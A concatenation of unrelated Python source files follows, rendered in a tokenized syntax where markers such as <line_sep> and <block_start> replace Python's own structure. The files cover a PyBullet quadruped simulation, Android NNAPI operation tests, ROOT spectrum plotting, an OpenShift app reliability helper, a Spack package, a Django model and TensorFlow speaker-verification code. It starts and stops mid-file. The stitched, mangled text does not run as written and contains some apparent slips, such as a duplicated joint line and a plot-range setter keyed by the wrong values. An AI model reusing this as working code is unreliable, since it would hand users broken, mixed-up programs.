kneeFrictionForce)<line_sep>p.setJointMotorControl(quadruped knee_back_leftR_link p.VELOCITY_CONTROL 0 kneeFrictionForce)<line_sep>p.setJointMotorControl(quadruped knee_back_leftL_link p.VELOCITY_CONTROL 0 kneeFrictionForce)<line_sep>p.setJointMotorControl(quadruped knee_back_leftR_link p.VELOCITY_CONTROL 0 kneeFrictionForce)<line_sep>p.setJointMotorControl(quadruped knee_back_rightL_link p.VELOCITY_CONTROL 0 kneeFrictionForce)<line_sep>p.setJointMotorControl(quadruped knee_back_rightR_link p.VELOCITY_CONTROL 0 kneeFrictionForce)<block_end>p.setGravity(0 0 -10)<line_sep>legnumbering=[motor_front_leftL_joint motor_front_leftR_joint motor_back_leftL_joint motor_back_leftR_joint motor_front_rightL_joint motor_front_rightR_joint motor_back_rightL_joint motor_back_rightR_joint]<for_stmt>i range(8)<block_start>print(legnumbering[i])<block_end>#use the Minitaur leg numbering p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[0] controlMode=p.POSITION_CONTROL targetPosition=motordir[0]<times>1.57 positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[1] controlMode=p.POSITION_CONTROL targetPosition=motordir[1]<times>1.57 positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[2] controlMode=p.POSITION_CONTROL targetPosition=motordir[2]<times>1.57 positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[3] controlMode=p.POSITION_CONTROL targetPosition=motordir[3]<times>1.57 positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[4] controlMode=p.POSITION_CONTROL targetPosition=motordir[4]<times>1.57 positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[5] controlMode=p.POSITION_CONTROL 
targetPosition=motordir[5]<times>1.57 positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[6] controlMode=p.POSITION_CONTROL targetPosition=motordir[6]<times>1.57 positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[7] controlMode=p.POSITION_CONTROL targetPosition=motordir[7]<times>1.57 positionGain=kp velocityGain=kd force=maxForce)<line_sep>#stand still p.setRealTimeSimulation(useRealTime)<line_sep>t=0.0<line_sep>t_end=t+15<line_sep>ref_time=time.time()<while_stmt>(t<l>t_end)<block_start>p.setGravity(0 0 -10)<if_stmt>(useRealTime)<block_start>t=time.time()-ref_time<block_end><else_stmt><block_start>t=t+fixedTimeStep<block_end><if_stmt>(useRealTime<eq>0)<block_start>p.stepSimulation()<line_sep>time.sleep(fixedTimeStep)<block_end><block_end>print("quadruped Id = ")<line_sep>print(quadruped)<line_sep>p.saveWorld("quadru.py")<line_sep>logId=p.startStateLogging(p.STATE_LOGGING_MINITAUR "quadrupedLog.bin" [quadruped])<line_sep>#jump t=0.0<line_sep>t_end=t+100<line_sep>i=0<line_sep>ref_time=time.time()<while_stmt>(1)<block_start><if_stmt>(useRealTime)<block_start>t=time.time()-ref_time<block_end><else_stmt><block_start>t=t+fixedTimeStep<block_end><if_stmt>(<true>)<block_start>target=math.sin(t<times>speed)<times>jump_amp+1.57<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[0] controlMode=p.POSITION_CONTROL targetPosition=motordir[0]<times>target positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[1] controlMode=p.POSITION_CONTROL targetPosition=motordir[1]<times>target positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[2] controlMode=p.POSITION_CONTROL targetPosition=motordir[2]<times>target positionGain=kp velocityGain=kd 
force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[3] controlMode=p.POSITION_CONTROL targetPosition=motordir[3]<times>target positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[4] controlMode=p.POSITION_CONTROL targetPosition=motordir[4]<times>target positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[5] controlMode=p.POSITION_CONTROL targetPosition=motordir[5]<times>target positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[6] controlMode=p.POSITION_CONTROL targetPosition=motordir[6]<times>target positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[7] controlMode=p.POSITION_CONTROL targetPosition=motordir[7]<times>target positionGain=kp velocityGain=kd force=maxForce)<block_end><if_stmt>(useRealTime<eq>0)<block_start>p.stepSimulation()<line_sep>time.sleep(fixedTimeStep)<block_end><block_end>
# # Copyright (C) 2018 The Android Open Source Project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # layout=BoolScalar("layout" <false>)# NHWC # TEST 1: SPACE_TO_BATCH_NCHW_1, block_size = [2, 2] i1=Input("op1" "TENSOR_FLOAT32" "{1, 2, 2, 2}")<line_sep>pad1=Parameter("paddings" "TENSOR_INT32" "{2, 2}" [0 0 0 0])<line_sep>o1=Output("op4" "TENSOR_FLOAT32" "{4, 1, 1, 2}")<line_sep>Model().Operation("SPACE_TO_BATCH_ND" i1 [2 2] pad1 layout).To(o1)<line_sep># Additional data type quant8=DataTypeConverter().Identify({i1:("TENSOR_QUANT8_ASYMM" 0.1 0) o1:("TENSOR_QUANT8_ASYMM" 0.1 0)})<line_sep># Instantiate an example example=Example({i1:[1.4 2.3 3.2 4.1 5.4 6.3 7.2 8.1] o1:[1.4 2.3 3.2 4.1 5.4 6.3 7.2 8.1]}).AddNchw(i1 o1 layout).AddVariations("relaxed" "float16" quant8)<line_sep># TEST 2: SPACE_TO_BATCH_NCHW_2, block_size = [2, 2] i2=Input("op1" "TENSOR_FLOAT32" "{1, 4, 4, 1}")<line_sep>o2=Output("op4" "TENSOR_FLOAT32" "{4, 2, 2, 1}")<line_sep>Model().Operation("SPACE_TO_BATCH_ND" i2 [2 2] pad1 layout).To(o2)<line_sep># Additional data type quant8=DataTypeConverter().Identify({i2:("TENSOR_QUANT8_ASYMM" 0.5 0) o2:("TENSOR_QUANT8_ASYMM" 0.5 0)})<line_sep># Instantiate an example example=Example({i2:[1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16] o2:[1 3 9 11 2 4 10 12 5 7 13 15 6 8 14 16]}).AddNchw(i2 o2 layout).AddVariations("relaxed" "float16" quant8)<line_sep># TEST 3: SPACE_TO_BATCH_NCHW_3, block_size = [3, 2] i3=Input("op1" "TENSOR_FLOAT32" "{1, 5, 2, 
1}")<line_sep>pad3=Parameter("paddings" "TENSOR_INT32" "{2, 2}" [1 0 2 0])<line_sep>o3=Output("op4" "TENSOR_FLOAT32" "{6, 2, 2, 1}")<line_sep>Model().Operation("SPACE_TO_BATCH_ND" i3 [3 2] pad3 layout).To(o3)<line_sep># Additional data type quant8=DataTypeConverter().Identify({i3:("TENSOR_QUANT8_ASYMM" 0.5 128) o3:("TENSOR_QUANT8_ASYMM" 0.5 128)})<line_sep># Instantiate an example example=Example({i3:[1 2 3 4 5 6 7 8 9 10] o3:[0 0 0 5 0 0 0 6 0 1 0 7 0 2 0 8 0 3 0 9 0 4 0 10]}).AddNchw(i3 o3 layout).AddVariations("relaxed" "float16" quant8)<line_sep># TEST 4: SPACE_TO_BATCH_NCHW_4, block_size = [3, 2] i4=Input("op1" "TENSOR_FLOAT32" "{1, 4, 2, 1}")<line_sep>pad4=Parameter("paddings" "TENSOR_INT32" "{2, 2}" [1 1 2 4])<line_sep>o4=Output("op4" "TENSOR_FLOAT32" "{6, 2, 4, 1}")<line_sep>Model().Operation("SPACE_TO_BATCH_ND" i4 [3 2] pad4 layout).To(o4)<line_sep># Additional data type quant8=DataTypeConverter().Identify({i4:("TENSOR_QUANT8_ASYMM" 0.25 128) o4:("TENSOR_QUANT8_ASYMM" 0.25 128)})<line_sep># Instantiate an example example=Example({i4:[1 2 3 4 5 6 7 8] o4:[0 0 0 0 0 5 0 0 0 0 0 0 0 6 0 0 0 1 0 0 0 7 0 0 0 2 0 0 0 8 0 0 0 3 0 0 0 0 0 0 0 4 0 0 0 0 0 0]}).AddNchw(i4 o4 layout).AddVariations("relaxed" "float16" quant8)<line_sep>
#! /usr/bin/env python <import_from_stmt>ROOT TCanvas TGraphErrors TLegend TPaveText<import_from_stmt>ROOT kBlack kBlue kRed<import_from_stmt>Helper Frame ReadHistList<import_from_stmt>Graphics Style<import_from_stmt>SpectrumContainer DataContainer<import_from_stmt>copy deepcopy<class_stmt>PeriodComparisonPlot<block_start><def_stmt>__init__ self<block_start>self.__comparisons=[]<line_sep>self.__canvas=<none><line_sep>self.__frames={}<line_sep>self.__legend=<none><block_end><def_stmt>AddComparison self comp<block_start>self.__comparisons.append(comp)<block_end><def_stmt>SetPlotRange self min max<block_start><for_stmt>comp self.__comparisons<block_start>comp.SetPlotRange(min max)<block_end><block_end><def_stmt>Draw self<block_start>self.__canvas=TCanvas("comparison%s"%(self.__comparisons[0].GetTriggerName()) "Comparison of different periods for trigger %s"%(self.__comparisons[0].GetTriggerName()) 1000 600)<line_sep>self.__canvas.Divide(2 1)<line_sep>self.__legend=TLegend(0.15 0.15 0.45 0.45)<line_sep>self.__legend.SetBorderSize(0)<line_sep>self.__legend.SetFillStyle(0)<line_sep>self.__legend.SetTextFont(42)<line_sep>specpad=self.__canvas.cd(1)<line_sep>specpad.SetGrid(<false> <false>)<line_sep>specpad.SetLogx(<true>)<line_sep>specpad.SetLogy(<true>)<line_sep>self.__frames["Spectra"]=Frame("axisSpec%s"%(self.__comparisons[0].GetTriggerName()) 0 100 1e-10 100)<line_sep>self.__frames["Spectra"].SetXtitle("p_{t} (GeV/c)")<line_sep>self.__frames["Spectra"].SetYtitle("1/N_{event} 1/(#Delta p_{t}) dN/dp_{t} ((GeV/c)^{-2})")<line_sep>self.__frames["Spectra"].Draw()<line_sep>self.__comparisons[0].DrawMinBiasSpectrum()<line_sep>self.__comparisons[0].AddMBtoLegend(self.__legend)<for_stmt>comp sorted(self.__comparisons)<block_start>comp.DrawTriggeredSpectrum()<line_sep>comp.AddTriggeredSpectrumToLegend(self.__legend)<block_end>self.__legend.Draw()<line_sep>self.__label=self.__comparisons[0].CreateLabel(0.5 0.75 0.89 
0.85)<line_sep>self.__label.Draw()<line_sep>rpad=self.__canvas.cd(2)<line_sep>rpad.SetGrid(<false> <false>)<line_sep>self.__frames["Ratios"]=Frame("axisRatio%s"%(self.__comparisons[0].GetTriggerName()) 0 100 0 2000)<line_sep>self.__frames["Ratios"].SetXtitle("p_{t} (GeV/c)")<line_sep>self.__frames["Ratios"].SetYtitle("%s / Min. Bias"%(self.__comparisons[0].GetTriggerName()))<line_sep>self.__frames["Ratios"].Draw()<for_stmt>comp sorted(self.__comparisons)<block_start>comp.DrawRatioTriggeredMinBias()<block_end>self.__canvas.cd()<block_end><def_stmt>SaveAs self filenamebase<block_start>""" Save plot as image file """<line_sep>types=["eps" "pdf" "jpeg" "gif" "png"]<for_stmt>t types<block_start>self.__canvas.SaveAs("%s.%s"%(filenamebase t))<block_end><block_end><block_end><class_stmt>TriggerComparison<block_start><def_stmt>__init__ self trgspec mbspec triggername dataname<block_start>self.__triggeredspectrum=trgspec<line_sep>self.__minbiasspectrum=mbspec<line_sep>self.__ratiospectra=self.__triggeredspectrum.MakeRatio(self.__minbiasspectrum)<line_sep>self.__ratiospectra.SetStyle(self.__triggeredspectrum.GetStyle())<line_sep>self.__triggername=triggername<line_sep>self.__dataname=dataname<block_end><def_stmt>__cmp__ self other<block_start>othername=other.GetDataName()<if_stmt>self.__dataname<eq>othername<block_start><return>0<block_end><elif_stmt>self.__dataname<l>othername<block_start><return>-1<block_end><else_stmt><block_start><return>1<block_end><block_end><def_stmt>SetPlotRange self min max<block_start>self.__triggeredspectrum.SetPlotRange(min max)<line_sep>self.__minbiasspectrum.SetPlotRange(min max)<line_sep>self.__ratiospectra.SetPlotRange(min max)<block_end><def_stmt>GetTriggerName self<block_start><return>self.__triggername<block_end><def_stmt>GetDataName self<block_start><return>self.__dataname<block_end><def_stmt>DrawTriggeredSpectrum self<block_start>self.__triggeredspectrum.Draw()<block_end><def_stmt>DrawMinBiasSpectrum 
self<block_start>self.__minbiasspectrum.Draw()<block_end><def_stmt>DrawRatioTriggeredMinBias self<block_start>self.__ratiospectra.Draw()<block_end><def_stmt>AddMBtoLegend self leg<block_start>self.__minbiasspectrum.AddToLegend(leg "MinBias")<block_end><def_stmt>AddTriggeredSpectrumToLegend self leg<block_start>self.__triggeredspectrum.AddToLegend(leg self.__dataname)<block_end><def_stmt>CreateLabel self xmin ymin xmax ymax<block_start>label=TPaveText(xmin ymin xmax ymax "NDC")<line_sep>label.SetBorderSize(0)<line_sep>label.SetFillStyle(0)<line_sep>label.SetTextFont(42)<line_sep>label.AddText("Trigger: %s"%(self.__triggername))<line_sep><return>label<block_end><block_end><class_stmt>GraphicsObject<block_start><def_stmt>__init__ self data name<block_start>self._data=data<line_sep>self._graphics=<none><line_sep>self._style=Style(kBlack 20)<line_sep>self._plotrange={"Min":<none> "Max":<none>}<line_sep>self._name=name<block_end><def_stmt>SetPlotRange self min max<block_start>self._plotrange[min]=min<line_sep>self._plotrange[max]=max<block_end><def_stmt>SetStyle self style<block_start>self._style=style<block_end><def_stmt>SetName self name<block_start>self._name=name<block_end><def_stmt>GetData self<block_start><return>self._data<block_end><def_stmt>GetGraphics self<block_start><return>self._graphics<block_end><def_stmt>GetStyle self<block_start><return>self._style<block_end><def_stmt>Draw self<block_start><if_stmt><not>self._graphics<block_start>self._graphics=TGraphErrors()<line_sep>np=0<for_stmt>bin range(1 self._data.GetXaxis().GetNbins()+1)<block_start><if_stmt>self._plotrange["Min"]<and>self._data.GetXaxis().GetBinLowEdge(bin)<l>self._plotrange["Min"]<block_start><continue><block_end><if_stmt>self._plotrange["Max"]<and>self._data.GetXaxis().GetBinUpEdge(bin)<g>self._plotrange["Max"]<block_start><break><block_end>self._graphics.SetPoint(np self._data.GetXaxis().GetBinCenter(bin) self._data.GetBinContent(bin))<line_sep>self._graphics.SetPointError(np 
self._data.GetXaxis().GetBinWidth(bin)/2. self._data.GetBinError(bin))<line_sep>np=np+1<block_end><block_end>self._graphics.SetMarkerColor(self._style.GetColor())<line_sep>self._graphics.SetLineColor(self._style.GetColor())<line_sep>self._graphics.SetMarkerStyle(self._style.GetMarker())<line_sep>self._graphics.Draw("epsame")<block_end><def_stmt>AddToLegend self legend title=<none><block_start><if_stmt>self._graphics<block_start>tit=self._name<if_stmt>title<block_start>tit=title<block_end>legend.AddEntry(self._graphics tit "lep")<block_end><block_end><block_end><class_stmt>Spectrum(GraphicsObject)<block_start><def_stmt>__init__ self data name<block_start>GraphicsObject.__init__(self data name)<block_end><def_stmt>MakeRatio self denominator<block_start>result=deepcopy(self._data)<line_sep>result.Divide(denominator.GetData())<line_sep>ratio=Ratio(result)<if_stmt>self._plotrange["Min"]<or>self._plotrange["Max"]<block_start>ratio.SetPlotRange(self._plotrange["Min"] self._plotrange["Max"])<block_end><return>ratio<block_end><block_end><class_stmt>Ratio(GraphicsObject)<block_start><def_stmt>__init__ self data name=<none><block_start>GraphicsObject.__init__(self data name)<block_end><block_end><def_stmt>ReadSpectra filename trigger<block_start>""" Read the spectra for different trigger classes from the root file Returns a dictionary of triggers - spectrum container """<line_sep>hlist=ReadHistList(filename "PtEMCalTriggerTask")<line_sep><return>DataContainer(eventHist=hlist.FindObject("hEventHist%s"%(trigger)) trackHist=hlist.FindObject("hTrackHist%s"%(trigger)))<block_end><def_stmt>MakeNormalisedSpectrum inputdata name<block_start>""" Normalise spectrum by the number of events and by the bin width """<line_sep>inputdata.SetVertexRange(-10. 
10.)<line_sep>inputdata.SetPileupRejection(<true>)<line_sep>inputdata.SelectTrackCuts(1)<line_sep><return>inputdata.MakeProjection(0 "ptSpectrum%s"%(name) "p_{t} (GeV/c)" "1/N_{event} 1/(#Delta p_{t}) dN/dp_{t} ((GeV/c)^{-2})")<block_end><def_stmt>ComparePeriods filea fileb filemb namea nameb trigger<block_start>triggers={}<line_sep>dataA=ReadSpectra(filea trigger)<line_sep>dataB=ReadSpectra(fileb trigger)<line_sep>dataMB=ReadSpectra(filemb "MinBias")<line_sep>specA=Spectrum(MakeNormalisedSpectrum(dataA namea) namea)<line_sep>specA.SetStyle(Style(kBlue 24))<line_sep>specB=Spectrum(MakeNormalisedSpectrum(dataB nameb) nameb)<line_sep>specB.SetStyle(Style(kRed 25))<line_sep>specMB=Spectrum(MakeNormalisedSpectrum(dataMB "MinBias") "MinBias")<line_sep>specMB.SetStyle(Style(kBlack 25))<line_sep>plot=PeriodComparisonPlot()<line_sep>plot.AddComparison(TriggerComparison(specA specMB trigger namea))<line_sep>plot.AddComparison(TriggerComparison(specB specMB trigger nameb))<line_sep>plot.SetPlotRange(2. 100.)<line_sep>plot.Draw()<line_sep><return>plot<block_end>
<import_from_stmt>.GlobalData global_data<import_from_stmt>.utils.oc oc<import_stmt>requests<import_stmt>time<import_stmt>logging<class_stmt>App<block_start><def_stmt>__init__ self deployment project template build_config route=""<block_start>self.project=project<line_sep>self.template=template<line_sep>self.deployment=deployment<line_sep>self.build_config=build_config<line_sep>self.route=route<line_sep>self.logger=logging.getLogger('reliability')<block_end><def_stmt>build self kubeconfig<block_start>(result rc)=oc("start-build -n "+self.project+" "+self.build_config kubeconfig)<if_stmt>rc<ne>0<block_start>self.logger.error("build_app: Failed to create app "+self.deployment+" in project "+self.project)<line_sep><return>"App build failed for build config : "+self.build_config<block_end><else_stmt><block_start><with_stmt>global_data.builds_lock<block_start>global_data.total_build_count<augadd>1<block_end><return>"App build succeeded for build config : "+self.build_config<block_end><block_end><def_stmt>visit self<block_start>visit_success=<false><try_stmt><block_start>r=requests.get("http://"+self.route+"/")<line_sep>self.logger.info(str(r.status_code)+": visit: "+self.route)<if_stmt>r.status_code<eq>200<block_start>visit_success=<true><block_end><block_end><except_stmt>Exception<as>e<block_start>self.logger.error(f"visit: {self.route} Exception {e}")<block_end><return>visit_success<block_end><def_stmt>scale_up self kubeconfig<block_start>(result rc)=oc("scale --replicas=2 -n "+self.project+" dc/"+self.deployment kubeconfig)<if_stmt>rc<ne>0<block_start>self.logger.error("scale_up: Failed to scale up "+self.project+"."+self.deployment)<line_sep><return>"App scale up failed for deployment : "+self.deployment<block_end><else_stmt><block_start><return>"App scale up succeeded for deployment : "+self.deployment<block_end><block_end><def_stmt>scale_down self kubeconfig<block_start>(result rc)=oc("scale --replicas=1 -n "+self.project+" dc/"+self.deployment 
kubeconfig)<if_stmt>rc<ne>0<block_start>self.logger.error("scale_down: Failed to scale down "+self.project+"."+self.deployment)<line_sep><return>"App scale down failed for deployment : "+self.deployment<block_end><else_stmt><block_start><return>"App scale down succeeded for deployment : "+self.deployment<block_end><block_end><block_end><class_stmt>Apps<block_start><def_stmt>__init__ self<block_start>self.failed_apps=0<line_sep>self.apps={}<line_sep>self.logger=logging.getLogger('reliability')<block_end><def_stmt>add self app kubeconfig<block_start>(result rc)=oc("new-app -n "+app.project+" --template "+app.template kubeconfig)<if_stmt>rc<ne>0<block_start>self.logger.error("create_app: Failed to create app "+app.deployment+" in project "+app.project)<line_sep><return><none><block_end><else_stmt><block_start>self.apps[app.project+"."+app.deployment]=app<line_sep>(route rc)=oc("get route --no-headers -n "+app.project+" | awk {'print $2'} | grep "+app.template kubeconfig)<if_stmt>rc<eq>0<block_start>app.route=route.rstrip()<line_sep>max_tries=60<line_sep>current_tries=0<line_sep>visit_success=<false><while_stmt><not>visit_success<and>current_tries<le>max_tries<block_start>self.logger.info(app.template+" route not available yet, sleeping 10 seconds")<line_sep>time.sleep(10)<line_sep>current_tries<augadd>1<line_sep>visit_success=app.visit()<block_end><if_stmt><not>visit_success<block_start>self.failed_apps<augadd>1<line_sep>self.logger.error("add_app: "+app.project+"."+app.deployment+" did not become available")<block_end><block_end><block_end><return>app<block_end># removing an app just removes the dictionary entry, actual app removed by project deletion <def_stmt>remove self app<block_start>self.apps.pop(app.project+"."+app.deployment)<block_end><def_stmt>simulate self<block_start>apps={}<line_sep>app1=App('cakephp-mysql-example' 'cakephp-mysql-example-0' 'cakephp-mysql-example' 
'cakephp-mysql-example')<line_sep>self.apps[app1.project+"."+app1.deployment]=app1<block_end># app2 = App('nodejs-mongodb-example','nodejs-mongodb-example-1','nodejs-mongodb-example','nodejs-mongodb-example') # self.apps[app2.project + "." + app2.deployment] = app2 <def_stmt>init self<block_start><pass><block_end><block_end>all_apps=Apps()<if_stmt>__name__<eq>"__main__"<block_start>app=App("cakephp-mysql-example" "t1" "cakephp-mysql-example" "cakephp-mysql-example")<line_sep>apps=Apps()<line_sep># apps.add(app) # time.sleep(180) app.visit()<line_sep>app.scale_up()<line_sep>time.sleep(30)<line_sep>app.scale_down()<line_sep>app.build()<block_end>
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) <import_from_stmt>spack *<class_stmt>Liblzf(AutotoolsPackage)<block_start>"""LibLZF is a very small data compression library. It consists of only two .c and two .h files and is very easy to incorporate into your own programs. The compression algorithm is very, very fast, yet still written in portable C."""<line_sep>homepage="http://oldhome.schmorp.de/marc/liblzf.html"<line_sep>url="http://dist.schmorp.de/liblzf/liblzf-3.6.tar.gz"<line_sep>version('3.6' sha256='9c5de01f7b9ccae40c3f619d26a7abec9986c06c36d260c179cedd04b89fb46a')<block_end>
# Django Library <import_from_stmt>django.contrib.auth.models User<import_from_stmt>django.db models<import_from_stmt>django.urls reverse<import_from_stmt>django.utils.translation ugettext_lazy<as>_<line_sep># Thirdparty Library <import_from_stmt>apps.base.models PyFather<line_sep># Tabla de Empleados <class_stmt>PyEmployee(PyFather)<block_start>name=models.CharField('Nombre' max_length=80)<line_sep>name2=models.CharField('<NAME>' max_length=80 blank=<true>)<line_sep>first_name=models.CharField('Apellido Paterno' max_length=80 blank=<true>)<line_sep>last_name=models.CharField('Apellido Materno' max_length=80 blank=<true>)<line_sep>phone=models.CharField('Teléfono' max_length=20 blank=<true>)<line_sep>email=models.CharField('Correo' max_length=40 blank=<true>)<def_stmt>get_absolute_url self<block_start><return>reverse('payroll:employee-detail' kwargs={'pk':self.pk})<block_end><def_stmt>__str__ self<block_start><return>format(self.name)<block_end><block_end>
<import_stmt>tensorflow<as>tf<import_stmt>numpy<as>np<import_stmt>os<import_stmt>time<import_from_stmt>utils random_batch normalize similarity loss_cal optim<import_from_stmt>configuration get_config<import_from_stmt>tensorflow.contrib rnn<line_sep>config=get_config()<def_stmt>train path<block_start>tf.reset_default_graph()# reset graph # draw graph batch=tf.placeholder(shape=[<none> config.N<times>config.M 40] dtype=tf.float32)# input batch (time x batch x n_mel) lr=tf.placeholder(dtype=tf.float32)# learning rate global_step=tf.Variable(0 name='global_step' trainable=<false>)<line_sep>w=tf.get_variable("w" initializer=np.array([10] dtype=np.float32))<line_sep>b=tf.get_variable("b" initializer=np.array([-5] dtype=np.float32))<line_sep># embedding lstm (3-layer default) <with_stmt>tf.variable_scope("lstm")<block_start>lstm_cells=[tf.contrib.rnn.LSTMCell(num_units=config.hidden num_proj=config.proj)<for>i range(config.num_layer)]<line_sep>lstm=tf.contrib.rnn.MultiRNNCell(lstm_cells)# define lstm op and variables outputs,_=tf.nn.dynamic_rnn(cell=lstm inputs=batch dtype=tf.float32 time_major=<true>)# for TI-VS must use dynamic rnn embedded=outputs[-1]# the last ouput is the embedded d-vector embedded=normalize(embedded)# normalize <block_end>print("embedded size: " embedded.shape)<line_sep># loss sim_matrix=similarity(embedded w b)<line_sep>print("similarity matrix size: " sim_matrix.shape)<line_sep>loss=loss_cal(sim_matrix type=config.loss)<line_sep># optimizer operation trainable_vars=tf.trainable_variables()# get variable list optimizer=optim(lr)# get optimizer (type is determined by configuration) grads,vars=zip(*optimizer.compute_gradients(loss))# compute gradients of variables with respect to loss grads_clip,_=tf.clip_by_global_norm(grads 3.0)# l2 norm clipping by 3 grads_rescale=[0.01<times>grad<for>grad grads_clip[:2]]+grads_clip[2:]# smaller gradient scale for w, b train_op=optimizer.apply_gradients(zip(grads_rescale vars) global_step=global_step)# gradient 
update operation # check variables memory variable_count=np.sum(np.array([np.prod(np.array(v.get_shape().as_list()))<for>v trainable_vars]))<line_sep>print("total variables :" variable_count)<line_sep># record loss loss_summary=tf.summary.scalar("loss" loss)<line_sep>merged=tf.summary.merge_all()<line_sep>saver=tf.train.Saver()<line_sep># training session <with_stmt>tf.Session()<as>sess<block_start>tf.global_variables_initializer().run()<line_sep>os.makedirs(os.path.join(path "Check_Point") exist_ok=<true>)# make folder to save model os.makedirs(os.path.join(path "logs") exist_ok=<true>)# make folder to save log writer=tf.summary.FileWriter(os.path.join(path "logs") sess.graph)<line_sep>epoch=0<line_sep>lr_factor=1# lr decay factor ( 1/2 per 10000 iteration) loss_acc=0# accumulated loss ( for running average of loss) <for_stmt>iter range(config.iteration)# run forward and backward propagation and update parameters <block_start>_,loss_cur,summary=sess.run([train_op loss merged] feed_dict={batch:random_batch() lr:config.lr<times>lr_factor})<line_sep>loss_acc<augadd>loss_cur# accumulated loss for each 100 iteration <if_stmt>iter%10<eq>0<block_start>writer.add_summary(summary iter)# write at tensorboard <block_end><if_stmt>(iter+1)%100<eq>0<block_start>print("(iter : %d) loss: %.4f"%((iter+1) loss_acc/100))<line_sep>loss_acc=0# reset accumulated loss <block_end><if_stmt>(iter+1)%10000<eq>0<block_start>lr_factor<augdiv>2# lr decay print("learning rate is decayed! 
current lr : " config.lr<times>lr_factor)<block_end><if_stmt>(iter+1)%10000<eq>0<block_start>saver.save(sess os.path.join(path "./Check_Point/model.ckpt") global_step=iter<floordiv>10000)<line_sep>print("model is saved!")<block_end><block_end><block_end><block_end># Test Session <def_stmt>test path<block_start>tf.reset_default_graph()<line_sep># draw graph enroll=tf.placeholder(shape=[<none> config.N<times>config.M 40] dtype=tf.float32)# enrollment batch (time x batch x n_mel) verif=tf.placeholder(shape=[<none> config.N<times>config.M 40] dtype=tf.float32)# verification batch (time x batch x n_mel) batch=tf.concat([enroll verif] axis=1)<line_sep># embedding lstm (3-layer default) <with_stmt>tf.variable_scope("lstm")<block_start>lstm_cells=[tf.contrib.rnn.LSTMCell(num_units=config.hidden num_proj=config.proj)<for>i range(config.num_layer)]<line_sep>lstm=tf.contrib.rnn.MultiRNNCell(lstm_cells)# make lstm op and variables outputs,_=tf.nn.dynamic_rnn(cell=lstm inputs=batch dtype=tf.float32 time_major=<true>)# for TI-VS must use dynamic rnn embedded=outputs[-1]# the last ouput is the embedded d-vector embedded=normalize(embedded)# normalize <block_end>print("embedded size: " embedded.shape)<line_sep># enrollment embedded vectors (speaker model) enroll_embed=normalize(tf.reduce_mean(tf.reshape(embedded[:config.N<times>config.M :] shape=[config.N config.M -1]) axis=1))<line_sep># verification embedded vectors verif_embed=embedded[config.N<times>config.M: :]<line_sep>similarity_matrix=similarity(embedded=verif_embed w=1. b=0. 
center=enroll_embed)<line_sep>saver=tf.train.Saver(var_list=tf.global_variables())<with_stmt>tf.Session()<as>sess<block_start>tf.global_variables_initializer().run()<line_sep># load model print("model path :" path)<line_sep>ckpt=tf.train.get_checkpoint_state(checkpoint_dir=os.path.join(path "Check_Point"))<line_sep>ckpt_list=ckpt.all_model_checkpoint_paths<line_sep>loaded=0<for_stmt>model ckpt_list<block_start><if_stmt>config.model_num<eq>int(model.split('-')[-1])# find ckpt file which matches configuration model number <block_start>print("ckpt file is loaded !" model)<line_sep>loaded=1<line_sep>saver.restore(sess model)# restore variables from selected ckpt file <break><block_end><block_end><if_stmt>loaded<eq>0<block_start><raise>AssertionError("ckpt file does not exist! Check config.model_num or config.model_path.")<block_end>print("test file path : " config.test_path)<line_sep># return similarity matrix after enrollment and verification time1=time.time()# for check inference time <if_stmt>config.tdsv<block_start>S=sess.run(similarity_matrix feed_dict={enroll:random_batch(shuffle=<false> noise_filenum=1) verif:random_batch(shuffle=<false> noise_filenum=2)})<block_end><else_stmt><block_start>S=sess.run(similarity_matrix feed_dict={enroll:random_batch(shuffle=<false>) verif:random_batch(shuffle=<false> utter_start=config.M)})<block_end>S=S.reshape([config.N config.M -1])<line_sep>time2=time.time()<line_sep>np.set_printoptions(precision=2)<line_sep>print("inference time for %d utterences : %0.2fs"%(2<times>config.M<times>config.N time2-time1))<line_sep>print(S)# print similarity matrix # calculating EER diff=1<line_sep>EER=0<line_sep>EER_thres=0<line_sep>EER_FAR=0<line_sep>EER_FRR=0<line_sep># through thresholds calculate false acceptance ratio (FAR) and false reject ratio (FRR) <for_stmt>thres [0.01<times>i+0.5<for>i range(50)]<block_start>S_thres=S<g>thres<line_sep># False acceptance ratio = false acceptance / mismatched population (enroll speaker != verification 
